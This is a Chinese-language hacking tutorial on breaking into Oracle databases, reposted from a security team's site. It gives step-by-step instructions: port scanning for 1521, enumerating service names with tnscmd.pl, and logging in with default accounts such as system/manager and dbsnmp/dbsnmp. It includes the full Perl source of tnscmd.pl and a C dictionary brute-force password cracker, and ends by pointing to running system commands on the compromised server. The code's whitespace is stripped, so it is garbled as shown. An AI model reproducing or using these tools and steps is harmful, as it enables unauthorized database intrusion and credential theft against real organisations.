入侵oracle数据库的一些技巧_黑客相关教程-查字典教程网

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

一、先看下面的一个贴子:

Oracle数据库是现在很流行的数据库系统，很多大型网站都采用Oracle，它之所以倍受用户喜爱是因为它有以下突出的特点：

1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库，其大小可到几百千兆，可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用，并使数据争用最小，保证数据一致性。系统维护具有高的性能，Oracle每天可连续24小时工作，正常的系统操作(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性，可在数据库级或在子数据库级上控制。

2、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以它是一个开放系统，保护了用户的投资。美国标准化和技术研究所(NIST)对Oracle7SERVER进行检验，100%地与ANSI/ISOSQL89标准的二级相兼容。

3、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全性。Oracle实施数据完整性，为可接受的数据指定标准。

4、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络，允许将处理分为数据库服务器和客户应用程序，所有共享的数据管理由数据库管理系统的计算机处理，而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境，Oracle将存放在多台计算机上的数据组合成一个逻辑数据库，可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。

具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运行，以致Oracle上所开发的应用可移植到任何操作系统，只需很少修改或不需修改。Oracle软件同工业标准相兼容，包括很多工业标准的操作系统，所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。

虽然Oracle数据库具有很高的安全性，但是如果我们在配置的时候不注意安全意识，那么也是很危险的。也就是说，安全最主要的还是要靠人自己，而不能过分依赖软件来实现。

我们知道，在mssql中，安装完成后默认有个sa的登陆密码为空，如果不更改就会产生安全漏洞。那么oracle呢?也有的。为了安装和调试的方便，Oracle数据库中的两个具有DBA权限的用户Sys和System的缺省密码是manager。笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码，其中也包括很多大型的电子商务网站，我们就可以利用这个缺省密码去找我们感兴趣的东西。如何实现，看下面的文章吧。

进行测试前我们先来了解一些相关的知识，我们连接一个Oracle数据库的时候，需要知道它的service_name或者是Sid值，就象mssql一样，需要知道数据库名。那如何去知道呢，猜?呵呵，显然是不行的。这里我们先讲讲oracle的TNSlistener，它位于数据库Client和数据库Server之间，默认监听1521端口，这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话，oracle将不会返回它的banner，如果你输入一些东西的话，它甚至有可能把你踢出去。这里我们就需要用tnscmd.pl这个perl程序了，它可以查询远程oracle数据库是否开启(也就是ping了)，查询版本，以及查询它的服务名，服务状态和数据库服务名，而且正确率很高。

理论方面的讲完了，如果还有什么不懂的可以去查找相关资料。现在开始测试吧，需要的工具有：ActivePerl，Oracle客户端，Superscan或者是其它扫描端口的软件，Tnscmd.pl。

我们先用Superscan扫描开放了端口1521的主机，假设其IP是xx.xx.110.110，这样目标已经有了。然后我们要做的就是用Tnscmd.pl来查询远程数据库的服务名了，Tnscmd.pl的用法如下：

C:perlbin>perltnscmd.pl

usage:tnscmd.pl[command]-hhostname

where'command'issomethinglikeping,version,status,etc.

(defaultisping)

[-pport]-alternateTCPporttouse(defaultis1521)

[--logfilelogfile]-writerawpacketstospecifiedlogfile

[--indent]-indent&outdentonparens

[--rawcmdcommand]-buildyourownCONNECT_DATAstring

[--cmdsizebytes]-fakeTNScommandsize(revealspacketleakage)

我们下面用的只有简单的几个命令，其他的命令也很好用，一起去发掘吧。

然后我们就这样来：

C:perlbin>perltnscmd.plservices-hxx.xx.110.110-p1521–indent

sending(CONNECT_DATA=(COMMAND=services))toxx.xx.110.110:1521

writing91bytes

reading

._.......6.........?...........

DESCRIPTION=

TMP=

VSNNUM=135286784

ERR=0

SERVICES_EXIST=1

.Q........

SERVICE=

SERVICE_NAME=ORCL

INSTANCE=

INSTANCE_NAME=ORCL

NUM=1

INSTANCE_CLASS=ORACLE

HANDLER=

HANDLER_DISPLAY=DEDICATEDSERVER

STA=ready

HANDLER_INFO=LOCALSERVER

HANDLER_MAXLOAD=0

HANDLER_LOAD=0

ESTABLISHED=447278

REFUSED=0

HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227

HANDLER_NAME=DEDICATED

ADDRESS=

PROTOCOL=beq

PROGRAM=/home/oracle/bin/oracle

ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'

ARGV0=oracleORCL

ARGS='

LOCAL=NO

.........@

从上面得到的信息我们可以看出数据库的服务名为ORCL，然后我们就可以通过sqlplus工具来远程连上它了，用户名和密码我们用默认的system/manager或者是sys/manager，其他的如mdsys/mdsys，ctxsys/ctxsys等，这个默认用户和密码是随版本的不同而改变的。如下：

C:oracleora90BIN>sqlplus/nolog

SQL*Plus:Release9.0.1.0.1-ProductiononThuMay2311:36:592002

SQL>connectsystem/manager@

(description=(address_list=(address=(protocol=tcp)

(host=xx.xx.110.110)(port=1521)))

(connect_data=(SERVICE_NAME=ORCL)));

如果密码正确，那么就会提示connected，如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了，那我们只能换别的目标了。但是我发现很多都是不改的，这个就是安全意识的问题了。

二、上面提到的两个小软件：

tnscmd.pl

Copycode

#!/usr/bin/perl

#tnscmd-alametooltoprodtheoracletnslsnrprocess(1521/tcp)

#testedunderLinuxx86&OpenBSDSparc+perl5

#Initialcruft:[email]jwa@jammed.com[/email]5Oct2000

#$Id:tnscmd,v1.32001/04/2606:45:48jwaExp$

#seealso:

#[url]http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html[/url]

#[url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0818[/url]

#[url]http://otn.oracle.com/deploy/security/alerts.htm[/url]

#[url]http://xforce.iss.net/alerts/advise66.php[/url]

#GPL'd,ofcourse.[url]http://www.gnu.org/copyleft/gpl.html[/url]

#$Log:tnscmd,v$

#Revision1.32001/04/2606:45:48jwa

#typoinurl.whoops.

#Revision1.22001/04/2606:42:17jwa

#completerewrite

#-useIO::Socketinsteadoftcp_open

#-gotridofpdump()

#-putpacketinto@listandbuilditwithpack()

#-added--indentoption

useIO::Socket;

usestrict;#agrumpyperlinterpreterisyourfriend

select(STDOUT);$|=1;

#processarguments

my($cmd)=$ARGV[0]if($ARGV[0]!~/^-/);

my($arg);

while($arg=shift@ARGV){

$main::hostname=shift@ARGVif($argeq"-h");

$main::port=shift@ARGVif($argeq"-p");

$main::logfile=shift@ARGVif($argeq"--logfile");

$main::fakepacketsize=shift@ARGVif($argeq"--packetsize");

$main::fakecmdsize=shift@ARGVif($argeq"--cmdsize");

$main::indent=1if($argeq"--indent");

$main::rawcmd=shift@ARGVif($argeq"--rawcmd");

$main::rawout=shift@ARGVif($argeq"--rawout");

}

if($main::hostnameeq""){

print<<_EOF_;

usage:$0[command]-hhostname

where'command'issomethinglikeping,version,status,etc.

(defaultisping)

[-pport]-alternateTCPporttouse(defaultis1521)

[--logfilelogfile]-writerawpacketstospecifiedlogfile

[--indent]-indent&outdentonparens

[--rawcmdcommand]-buildyourownCONNECT_DATAstring

[--cmdsizebytes]-fakeTNScommandsize(revealspacketleakage)

_EOF_

exit(0);

}

#withnocommands,defaulttopingingport1521

$cmd="ping"if($cmdeq"");

$main::port=1521if($main::porteq"");#1541,1521..DBAsaresowhimsical

#main

my($command);

if(defined($main::rawcmd))

{

$command=$main::rawcmd;

}

else

{

$command="(CONNECT_DATA=(COMMAND=$cmd))";

}

my$response=tnscmd($command);

viewtns($response);

exit(0);

#buildthepacket,openthesocket,sendthepacket,returntheresponse

subtnscmd

{

my($command)=shift@_;

my($packetlen,$cmdlen);

my($clenH,$clenL,$plenH,$plenL);

my($i);

print"sending$commandto$main::hostname:$main::portn";

if($main::fakecmdsizene"")

{

$cmdlen=$main::fakecmdsize;

print"Fakingcommandlengthto$cmdlenbytesn";

}

else

{

$cmdlen=length($command);

}

$clenH=$cmdlen>>8;

$clenL=$cmdlen&0xff;

#calculatepacketlength

if(defined($main::fakepacketsize))

{

print"Fakingpacketlengthto$main::fakepacketsizebytesn";

$packetlen=$main::fakepacketsize;

}

else

{

$packetlen=length($command)+58;#"preamble"is58bytes

}

$plenH=$packetlen>>8;

$plenL=$packetlen&0xff;

$packetlen=length($command)+58if(defined($main::fakepacketsize));

#decimaloffset

#0:packetlen_highpacketlen_low

#26:cmdlen_highcmdlen_low

#58:command

#thepacket.

my(@packet)=(

$plenH,$plenL,0x00,0x00,0x01,0x00,0x00,0x00,

0x01,0x36,0x01,0x2c,0x00,0x00,0x08,0x00,

0x7f,0xff,0x7f,0x08,0x00,0x00,0x00,0x01,

$clenH,$clenL,0x00,0x3a,0x00,0x00,0x00,0x00,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x00,0x00,0x00,0x34,0xe6,0x00,0x00,

0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,

0x00,0x00

);

for($i=0;$i<length($command);$i++)

{

push(@packet,ord(substr($command,$i,1)));

}

my($sendbuf)=pack("C*",@packet);

print"connect";

my($tns_sock)=IO::Socket::INET->new(

PeerAddr=>$main::hostname,

PeerPort=>$main::port,

Proto=>'tcp',

Type=>SOCK_STREAM,

Timeout=>30)||die"connectto$main::hostnamefailure:$!";

$tns_sock->autoflush(1);

print"rwriting".length($sendbuf)."bytesn";

if(defined($main::logfile))

{

open(SEND,">$main::logfile.send")||die"can'twrite$main::logfile.send:$!";

printSEND$sendbuf||die"writetologfilefailed:$!";

close(SEND);

}

my($count)=syswrite($tns_sock,$sendbuf,length($sendbuf));

if($count!=length($sendbuf))

{

print"onlywrote$countbytes?!";

exit1;

}

print"readingn";

#getfundata

#1st12byteshavesomemeaningwhichsofareludesme

if(defined($main::logfile))

{

open(REC,">$main::logfile.rec")||die"can'twrite$main::logfile.rec:$!";

}

my($buf,$recvbuf);

#readuntilsocketEOF

while(sysread($tns_sock,$buf,128))

{

printREC$bufif(defined($main::logfile));

$recvbuf.=$buf;

}

close(REC)if(defined($main::logfile));

close($tns_sock);

return$recvbuf;

}

subviewtns

{

my($response)=shift@_;

#shouldhaveahexdumpoption...

if($main::raw)

{

print$response;

}

else

{

$response=~tr/200-377/00-177/;#striphighbits

$response=~tr/00-27/./;

$response=~tr/177/./;

if($main::indent)

{

parenify($response);

}

else

{

print$response;

}

print"n";

}

subparenify

{

my($buf)=shift@_;

my($i,$c);

my($indent,$o_indent);

for($i=0;$i<length($buf);$i++)

{

$c=substr($buf,$i,1);

$indent++if($ceq"(");

$indent--if($ceq")");

if($indent!=$o_indent)

{

print"n"unless(substr($buf,$i+1,1)eq"(");

print""x$indent;

$o_indent=$indent;

undef$c;

}

print$c;

}

Copycode

/*用链表实现的oracle密码暴破程序,需要在本地安装oralce*/

#defineWIN32_LEAN_AND_MEAN

#ifdefined(_WIN32)||defined(_WIN64)

#include<windows.h>

#include<Tchar.h>

#endif

#include<winsock2.h>

#include<stdio.h>

#include<stdlib.h>

#include<lmcons.h>

#include<winnetwk.h>

#include<time.h>

#include<stdlib.h>

#include<iostream>

#include<occi.h>

#pragmacomment(lib,"oraocci9.lib")//链接到oraocci9.lib库

//#pragmacomment(lib,"msvcrt.lib")

#pragmacomment(lib,"msvcprt.lib")

//链接到WS2_32.LIB库:

#pragmacomment(lib,"Ws2_32.lib")

//#pragmacomment(lib,"liboracle.lib")

chartarget[40]={0};//目标服务器

charport[40]={0};//SQL端口号

chardb[40]={0};//数据库名

//定义链表:

typedefstructPassNode{

TCHARpassword[100];

structPassNode*Next;

}PassInfo;

typedefstructNameNode{

TCHARName[100];

structNameNode*Next;

}NameInfo;//定义NameInfo来表示NameNode结构

//函数SQLCheck

//功能:尝试用不同密码连接SQLServer,探测出正确的密码

DWORDWINAPISQLCheck(PVOIDpPwd,PVOIDuUserName)

{

//定义局部变量

charszBuffer[1025]={0};

char*pwd=NULL,*UserName=NULL;

charDataBase[255]={0};

//char*user=NULL;

//取得传递过来准备探测的密码

pwd=(char*)pPwd;

UserName=(char*)uUserName;

//DataBase=(char*)db;

sprintf(DataBase,"(description=(address_list=(address=(protocol=tcp)(host=%s)(port=%s)))(connect_data=(SERVICE_NAME=%s)))",target,port,db);

//printf("DataBase=%sn",DataBase);

usingnamespacestd;

usingnamespaceoracle::occi;

Environment*env=Environment::createEnvironment(Environment::DEFAULT);

try{

Connection*conn=env->createConnection(UserName,pwd,(char*)DataBase);

if(conn)

{printf("n");

cout<<"SUCCESS-createConnection"<<endl;

//连接远程oracleServer数据库成功

return1;

}

else

cout<<"FAILURE-createConnection"<<endl;

return0;

/*Statement*stmt=conn->createStatement("select*fromemp");

ResultSet*rset=stmt->executeQuery();

while(rset->next()){

cout<<"theempnois:"<<rset->getInt(1)<<endl;

cout<<"theenameis:"<<rset->getString(2)<<endl;

}*/

//stmt->closeResultSet(rset);

//conn->terminateStatement(stmt);

env->terminateConnection(conn);

}catch(SQLExceptionex)

{

//printf("n");

cout<<ex.getMessage();

return0;

}

Environment::terminateEnvironment(env);

return0;

}

voidusage(){

printf("name:oraclepasswordcrackv1.0n");

printf("author:pt007@vip.sina.comnn");

fprintf(stdout,"usage:oracle_pwd_crack[ip][options]n");

printf("options:n"

"t-xportspecifytheportoforaclen"

"t-uusernamespecifytheusernameoforaclen"

//"t-ppasswordspecifythepasswordoforaclen"

"t-ddictspecifythedictionaryn"

"t-idatabasespecifythedatabase'snamen"

//"t-aautomodeautomaticcracktheoraclepasswordn"

//"tNote:whenuusethe-aoption,namedtheusernamedictuser.dicn"

//"tpassworddictpass.dicn"

);

printf("nexample:oracle_pwd_crack127.0.0.1-x1521-usql_user.dic-dpass.dic-iPLSExtProcn");

exit(1);

}

//创建密码链表:

PassInfo*Create_Pass_link(intNodeNum,FILE*DictFile){

/*readdatafrompassworddictionary,initthelink*/

TCHAR*szTempPass=NULL;

PassInfo*h,*p,*s;/**hpointtoheadnode,*ppointtotheprenode,

*spointtothecurrentnode*/

inti;/*counter*/

//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(PassInfo)"字节的连续区域,函数的返回值为该区域的首地址:

if((h=(PassInfo*)malloc(sizeof(PassInfo)))==NULL)

{

fprintf(stderr,"mallocfailed%d",GetLastError());

exit(0);

}/*createtheheadnode*/

/*inittheheadnode*/

h->Next=NULL;

p=h;

for(i=0;i<NodeNum;i++)//下面是建立链表,每个密码对应一个结点:

{//按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass

szTempPass=(TCHAR*)calloc(100,sizeof(TCHAR));

ZeroMemory(szTempPass,100);

if((s=(PassInfo*)malloc(sizeof(PassInfo)))==NULL)

{

fprintf(stderr,"mallocfailed%d",GetLastError());

exit(0);

}

memset(s->password,'',100);

fgets(szTempPass,100,DictFile);

strncpy(s->password,szTempPass,strlen(szTempPass)-1);

s->Next=NULL;//删除一个结点

p->Next=s;//链表指针指向下一个结构地址

p=s;//下一个结构的数据域赋值

free(szTempPass);//释放内存空间

}

returnh;//返回链表的头结点,它存放有第一个结点的首地址,没有数据

}

//创建用户名链表:

NameInfo*Create_Name_link(intNodeNum,FILE*DictFile){

/*readdatafrompassworddictionary,initthelink*/

TCHAR*szTempName=NULL;

NameInfo*h,*p,*s;/**hpointtoheadnode,*ppointtotheprenode,

*spointtothecurrentnode*/

inti;/*counter*/

//分配内存空间在内存的动态存储区中分配一块长度为"sizeof(NameInfo)"字节的连续区域,函数的返回值为该区域(此处为NameInfo结构的首地址)的首地址::

if((h=(NameInfo*)malloc(sizeof(NameInfo)))==NULL)

{

fprintf(stdout,"mallocfailed%d",GetLastError());

exit(0);

}/*createtheheadnode*/

/*inittheheadnode*/

h->Next=NULL;//删除下一个结点

p=h;//p里面目前指向头结点

for(i=0;i<NodeNum;i++)

{//按sizeof(TCHAR)的长度分配100块连续的区域,并把指向TCHAR类型指针的首地址赋予指针变量szTempPass:

szTempName=(TCHAR*)calloc(100,sizeof(TCHAR));

ZeroMemory(szTempName,100);//字符串类型变量清0

if((s=(NameInfo*)malloc(sizeof(NameInfo)))==NULL)

{

fprintf(stdout,"mallocfailed%d",GetLastError());

exit(0);

}

memset(s->Name,'',100);

fgets(szTempName,100,DictFile);

strncpy(s->Name,szTempName,strlen(szTempName)-1);

s->Next=NULL;

p->Next=s;//p指向下一个结点的地址

p=s;//下一个结构的数据域赋值

free(szTempName);

}

returnh;

}

intLineCount(FILE*fd)//返回字典中的密码数量

{

intcountline=0;

chardata[100]={0};//字符数组清0

while(fgets(data,100,fd))//从指定的文件中读一个字符串到字符数组中

countline++;

rewind(fd);//指针返回到文件起始处

returncountline;

}

BOOLIsPortOpen(char*address,intport)

{

intrecv=1;

WSADATAwsadata;

intfd;

structsockaddr_inclientaddress;

structhostent*host1;

BOOLResult=FALSE;

structtimevaltimer4;

fd_setwritefd;//检查数据是否可写

ULONGvalue=1;

//初使化winsock版本1.1:

recv=WSAStartup(MAKEWORD(1,1),&wsadata);

if(recv!=0)

{

printf("initfailed%d.n",WSAGetLastError());

return(0);

}

if(LOBYTE(wsadata.wVersion)!=1||

HIBYTE(wsadata.wVersion)!=1){

/*Telltheuserthatwecouldn'tfindauseable*/

/*winsock.dll.*/

WSACleanup();

return(0);

}

//创建socket套接字连接:

fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

if(fd<0)

{

printf("[-]Createsocketerror%d.n",WSAGetLastError());

return(0);

}

//将套接字fd设为非阻塞模式的方法:

ioctlsocket(fd,FIONBIO,&value);

if(!(host1=gethostbyname(address))){

printf("[-]Gethostbyname(%s)error%d.n",address,WSAGetLastError());

return(0);

}

memset(&clientaddress,0,sizeof(structsockaddr));

clientaddress.sin_family=AF_INET;//Ipv4地址族

clientaddress.sin_port=htons((unsignedshort)port);

clientaddress.sin_addr=*((structin_addr*)host1->h_addr);

timer4.tv_sec=5;//以秒为单位指定等待时间

timer4.tv_usec=0;

FD_ZERO(&writefd);

FD_SET(fd,&writefd);//将套接字fd增添到writefd写集合中进行测试

recv=connect(fd,(structsockaddr*)&clientaddress,sizeof(structsockaddr));

if(FD_ISSET(fd,&writefd))

{

recv=select(fd+1,NULL,&writefd,NULL,&timer4);//测试5秒钟内是否有数据写入

if(recv>0)

Result=TRUE;

}

closesocket(fd);

WSACleanup();

returnResult;

}

intmain(intargc,char**argv)

{

PassInfo*head,*curr=NULL;

NameInfo*headnode,*currnode=NULL;

intnamecount=0,passcount=0;

/////////////////////////////////////////////////////////////////////////////////////////////

//dealwiththecommandline

/////////////////////////////////////////////////////////////////////////////////////////////

//参数不为8个的时候打印帮助

if(argc!=10)

usage();

if(argc==10)

{

if(strcmpi(argv[2],"-x"))

usage();

if(strcmpi(argv[4],"-u"))

usage();

if(strcmpi(argv[6],"-d"))

usage();

if(strcmpi(argv[8],"-i"))

usage();

}

/*determinatewhethertheoracleportisopen*/

if(!IsPortOpen(argv[1],atoi(argv[3])))

{

printf("error:Can'tconnectto%s:%dn",argv[1],atoi(argv[3]));

exit(0);

}

////////////////////////////////////////////////////////////////////////////////////////////

//specifiytheusername

//////////////////////////////////////////////////////////////////////////////////////////////

//取得目标地址和端口号:

strcpy(target,argv[1]);

strcpy(port,argv[3]);

strcpy(db,argv[9]);

if(!strcmpi(argv[4],"-u"))

{

/*openthepassworddictionary*/

FILE*passdic=NULL;

if((passdic=fopen(argv[7],"r"))==NULL){

fprintf(stdout,"Can'topenthepassworddictionaryn");

exit(0);

}

/*countlineofnamedictionary*/

passcount=LineCount(passdic);//计算密码的数量

head=Create_Pass_link(passcount,passdic);/*createthepasswordlink*/

curr=head->Next;//指向第一个结点

/*openthepassworddictionary*/

FILE*Namedict=NULL;

if((Namedict=fopen(argv[5],"r"))==NULL){

fprintf(stderr,"Can'topenthenamedictionaryn");

exit(0);

}

/*密码最终保存文件*/

FILE*passtxt=NULL;

if((passtxt=fopen("pass.txt","at+"))==NULL){

fprintf(stdout,"Can'twritepass.txtfile!n");

exit(0);

}

/*countlineofnamedictionary*/

namecount=LineCount(Namedict);//计算用户名数量

headnode=Create_Name_link(namecount,Namedict);/*createuserlink*/

currnode=headnode->Next;

intj=0,i=1;

while(currnode!=NULL)//为NULL表示姓名链表结束

{

printf("n开始第%d位用户%s测试:n",++j,currnode->Name);

while(curr!=NULL)//为NULL表示密码链表结束

{

printf("Nowcracking%s->%sn",currnode->Name,curr->password);

fflush(NULL);

intCracked=0;

Cracked=SQLCheck(curr->password,currnode->Name);

if(Cracked==1)

{

printf("%d.Successfully:oracleserver%s'susername[%s]password[%s]n",j,target,currnode->Name,curr->password);

fseek(passtxt,0L,SEEK_END);//移动到文件尾部

fprintf(passtxt,"%d.Successfully:oracleserver%s'susername[%s]password[%s]rn",i++,target,currnode->Name,curr->password);

//exit(0);发现一个密码就退出

break;

}

curr=curr->Next;//移动到下一个结点

Sleep(100);//暂停100ms,即0.1s

}/*startingcracktheoraclepassword*/

currnode=currnode->Next;

curr=head->Next;//移到密码链表的第一个结点

}

printf("nn密码猜解结束:n本次共猜解了%d位用户,%d个密码!n",namecount,passcount);

printf("请使用"typepass.txt"来查看当前目录下的pass.txt文件!n");

fprintf(passtxt,"rnrn");

fclose(passdic);

fclose(Namedict);

fclose(passtxt);

free(head);

}

return0;

}

三、利用弱口令进行入侵:

C:>sqlplus/nolog

SQL>connectsystem/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)(port=1521)))(connect_data=(SERVICE_NAME=ora9i)));

然后利用OracleExecuteCommandSqlScript来执行系统命令